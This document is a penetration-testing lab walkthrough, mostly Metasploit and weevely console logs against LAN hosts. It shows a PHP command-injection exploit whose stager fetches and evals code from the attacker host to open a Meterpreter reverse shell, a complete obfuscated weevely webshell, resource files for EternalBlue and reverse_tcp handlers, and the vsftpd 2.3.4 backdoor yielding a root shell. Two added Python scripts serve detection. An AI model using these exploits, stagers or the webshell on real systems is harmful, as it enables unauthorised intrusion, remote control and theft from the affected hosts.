[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800


Exploiting Web Vulnerabilities

Windows 10, 7, 2003, 2000

The URL http://192.168.0.160:8100/sec/17/example.php?cmd= has a PHP command injection vulnerability.

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8899
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:8899  
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  
[*] Server started.  
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
Enter in the browser: http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22
[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
  Id  Name  Type                   Information       Connection
  --  ----  ----                   -----------       ----------
  1         meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dir
Listing: /var/www/html/sec/17
=============================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.php
meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data
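In the web server's access log the request above is conspicuous: a cmd parameter whose decoded value contains an interpreter invocation, stager functions and a remote URL. The script below is an added detection example, not part of the original write-up; it parses constructed Apache-style log lines (the first carries the exact request used above), decodes the cmd value and grades it.

```python
"""Flag command-injection stagers in web server access logs.

Added detection example; not part of the original lab or of Metasploit.
The access-log lines below are constructed in Apache combined-log shape;
the first carries the exact request used above. The parameter name "cmd"
is the one the vulnerable example.php takes.
"""
import re
from urllib.parse import urlsplit, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
INTERPRETERS = ("php -d", "php -r", "python -c", "python3 -c", "perl -e",
                "powershell", "regsvr32", "mshta", "certutil", "wget ", "curl ")
STAGER_FUNCS = ("eval(", "file_get_contents(", "base64_decode(", "gzuncompress(",
                "stream_context_create(", "assert(", "system(", "passthru(")
URL_RE = re.compile(r"""https?://[^\s'"(),;]+""")

SAMPLE_ACCESS_LOG = """\
192.168.0.150 - - [16/Jun/2022:18:38:10 +0800] "GET /sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22 HTTP/1.1" 200 1114
192.168.0.20 - - [16/Jun/2022:18:40:02 +0800] "GET /sec/17/example.php?cmd=date HTTP/1.1" 200 64
192.168.0.21 - - [16/Jun/2022:18:41:15 +0800] "GET /sec/17/index.php HTTP/1.1" 200 512
"""


def decode_param(value):
    """URL-decode, twice if needed, so a double-encoded value cannot slip past the checks."""
    for _ in range(2):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_target(target, param="cmd"):
    """Return (decoded cmd value, list of findings) for one request target."""
    query = urlsplit(target).query
    cmd = ""
    for pair in query.split("&"):          # manual split: the value itself may contain ';' and '='
        key, _, value = pair.partition("=")
        if key == param:
            cmd = decode_param(value)
            break
    findings = []
    low = cmd.lower()
    findings += [f"interpreter:{t.strip()}" for t in INTERPRETERS if t in low]
    findings += [f"stager:{f[:-1]}" for f in STAGER_FUNCS if f in low]
    findings += [f"remote_url:{u}" for u in URL_RE.findall(cmd)]
    return cmd, findings


def scan(log_text):
    """Alerts for every request that carries the injectable parameter."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd, findings = analyse_target(m["target"])
        if not cmd:
            continue
        severity = "critical" if len(findings) >= 3 else "high" if findings else "low"
        alerts.append({"ip": m["ip"], "ts": m["ts"], "severity": severity,
                       "cmd": cmd, "findings": findings})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_ACCESS_LOG):
        print(f'{a["ip"]} {a["severity"]:8s} {a["cmd"][:60]!r} {a["findings"]}')
```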


Remote Control via a Web System

#weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.



testweb.php

<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>


# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456
[+] weevely 4.0.1
[+] Target: 192.168.0.150:8100
[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> help
 :file_rm                      Remove remote file.
 :file_clearlog                Remove string from a file.
 :file_edit                    Edit remote file on a local editor.
 :file_bzip2                   Compress or expand bzip2 files.
 :file_upload                  Upload file to remote filesystem.
 :file_download                Download file from remote filesystem.
 :file_ls                      List directory content.
 :file_webdownload             Download an URL.
 :file_cp                      Copy single file.
 :file_find                    Find files with given names and attributes.
 :file_enum                    Check existence and permissions of a list of paths.
 :file_tar                     Compress or expand tar archives.
 :file_touch                   Change file timestamp.
 :file_zip                     Compress or expand zip files.
 :file_mount                   Mount remote filesystem using HTTPfs.
 :file_gzip                    Compress or expand gzip files.
 :file_cd                      Change current working directory.
 :file_upload2web              Upload file automatically to a web folder and get corresponding URL.
 :file_read                    Read remote file from the remote filesystem.
 :file_grep                    Print lines matching a pattern in multiple files.
 :file_check                   Get attributes and permissions of a file.
 :shell_sh                     Execute shell commands.
 :shell_php                    Execute PHP commands.
 :shell_su                     Execute commands with su.
 :sql_dump                     Multi dbms mysqldump replacement.
 :sql_console                  Execute SQL query or run console.
 :system_extensions            Collect PHP and webserver extension list.
 :system_info                  Collect system information.
 :system_procs                 List running processes.
 :audit_filesystem             Audit the file system for weak permissions.
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_etcpasswd              Read /etc/passwd with different techniques.
 :audit_suidsgid               Find files with SUID or SGID flags.
 :audit_phpconf                Audit PHP configuration.
 :bruteforce_sql               Bruteforce SQL database.
 :backdoor_tcp                 Spawn a shell on a TCP port.
 :backdoor_reversetcp          Execute a reverse TCP shell.
 :net_scan                     TCP Port scan.
 :net_proxy                    Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_ifconfig                 Get network interfaces addresses.
 :net_curl                     Perform a curl-like HTTP request.
 :net_mail                     Send mail.
 :net_phpproxy                 Install PHP proxy on the target.
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ system_info
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| document_root    | C:/xampp/htdocs                                                                         |
| whoami                 |                                                                                           |
| hostname              | DESKTOP-9A8VFKB                                                                         |
| pwd                    | C:\xampp\htdocs\sec\19                                                                |
| open_basedir           |                                                                                           |
| safe_mode              | False                                                                                     |
| script                 | /sec/19/testweb.php                                                                     |
| script_folder          | C:\xampp\htdocs\sec\19                                                                |
| uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 |
| os                     | Windows NT                                                                              |
| client_ip              | 192.168.0.150                                                                           |
| max_execution_time   | 30                                                                                        |
| php_self               | /sec/19/testweb.php                                                                     |
| dir_sep                | \                                                                                         |
| php_version            | 5.6.28                                                                                  |
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ autit_filesystem
'autit_filesystem' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
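Static detection of this kind of shell does not require running it: testweb.php hides create_function behind str_replace('R','',...), splits eval, gzuncompress and base64_decode with a junk token that str_replace('hg','',...) removes at runtime, and then calls the result through a variable. The scanner below is an added example, not part of the original or of weevely; it runs on a constructed, deliberately incomplete fragment that only mimics that layout, reverses the two str_replace tricks statically and reports what they hide.

```python
"""Statically unpick str_replace-based PHP webshell obfuscation.

Added detection example; not part of the original write-up or of weevely.
The PHP fragment below is constructed and deliberately incomplete (it is not
a working shell); it only reproduces the layout of testweb.php: string
pieces with a junk token ('hg'), create_function hidden behind
str_replace('R','',...), reassembly via str_replace('hg','',...), and a
call through a variable function.
"""
import re

DANGEROUS_CALLS = ("eval", "create_function", "assert", "gzuncompress", "gzinflate",
                   "base64_decode", "str_rot13", "system", "passthru", "shell_exec", "exec")
INPUT_SOURCES = ("php://input", "$_POST", "$_GET", "$_REQUEST", "$_COOKIE", "getallheaders")

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# str_replace('tok', '', 'literal')  -> a function name spelled out with junk letters
STRIP_LITERAL_RE = re.compile(r"str_replace\(\s*'([^']+)'\s*,\s*''\s*,\s*'([^']*)'\s*\)")
# str_replace('tok', '', $a.$b.$c)   -> code reassembled from string variables
STRIP_VARS_RE = re.compile(r"str_replace\(\s*'([^']+)'\s*,\s*''\s*,\s*((?:\$\w+\s*\.?\s*)+)\)")
VARIABLE_CALL_RE = re.compile(r"\$(\w+)\s*\(")   # $x(...) is always a variable function call

SAMPLE_PHP = r"""<?php
$B='hg$o="";for($i=0;$i<$l;$i++)hg{$o.=$t{$i}^$k{$i%$c};}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="KEYhgPLACEHOLDER";functihgon x($t,$k){';
$I='@evahgl(@gzuncomhgpress(@x(@bashge64_decode(@file_get_conhgtents("php://inhgput")),$k)));';
$J=str_replace('hg','',$L.$B.$I);
$h=$R('',$J);$h();
?>"""

BENIGN_PHP = r"""<?php
$stamp = str_replace('-', '', '2022-07-14');
echo date('Ymd') === $stamp ? 'today' : 'other';
?>"""


def calls_in(code):
    """Dangerous function names that appear as calls in a piece of PHP."""
    return [n for n in DANGEROUS_CALLS if re.search(r"\b" + re.escape(n) + r"\s*\(", code)]


def analyse_php(src):
    literals = dict(ASSIGN_RE.findall(src))      # $name => single-quoted string content
    hidden = []
    for token, literal in STRIP_LITERAL_RE.findall(src):
        revealed = literal.replace(token, "")
        if revealed in DANGEROUS_CALLS:
            hidden.append(revealed)
    reassembled_calls, sources = [], []
    for token, var_expr in STRIP_VARS_RE.findall(src):
        joined = "".join(literals.get(v, "") for v in re.findall(r"\$(\w+)", var_expr))
        code = joined.replace(token, "")      # what the shell would hand to create_function
        reassembled_calls += calls_in(code)
        sources += [s for s in INPUT_SOURCES if s in code]
    variable_calls = VARIABLE_CALL_RE.findall(src)
    score = 2 * len(hidden) + len(reassembled_calls) + len(sources) + len(variable_calls)
    return {"hidden_names": hidden, "reassembled_calls": reassembled_calls,
            "input_sources": sources, "variable_calls": variable_calls,
            "score": score, "verdict": "webshell" if score >= 5 else "clean"}


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_PHP), ("benign", BENIGN_PHP)):
        print(name, analyse_php(src))
```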


Resource Files


The Simplest Resource File

# echo version > resource.rc
# echo load sounds >> resource.rc


# msfconsole -r resource.rc
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console  : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >


Resource File for Attacking Windows 7

windows7.rc

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.155
run


# msfconsole -r windows7.rc


Resource File for Attacking Windows 10

windows10.rc

use exploit/multi/handler
set lhost 192.168.0.150
set lport 8888
set payload windows/meterpreter/reverse_tcp
run


# msfconsole -r windows10.rc


Resource File for Attacking Android

android.rc

use exploit/multi/handler
set lhost 192.168.0.150
set lport 9999
set payload android/meterpreter/reverse_tcp
run


# msfconsole -r android.rc


Penetrating Linux

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800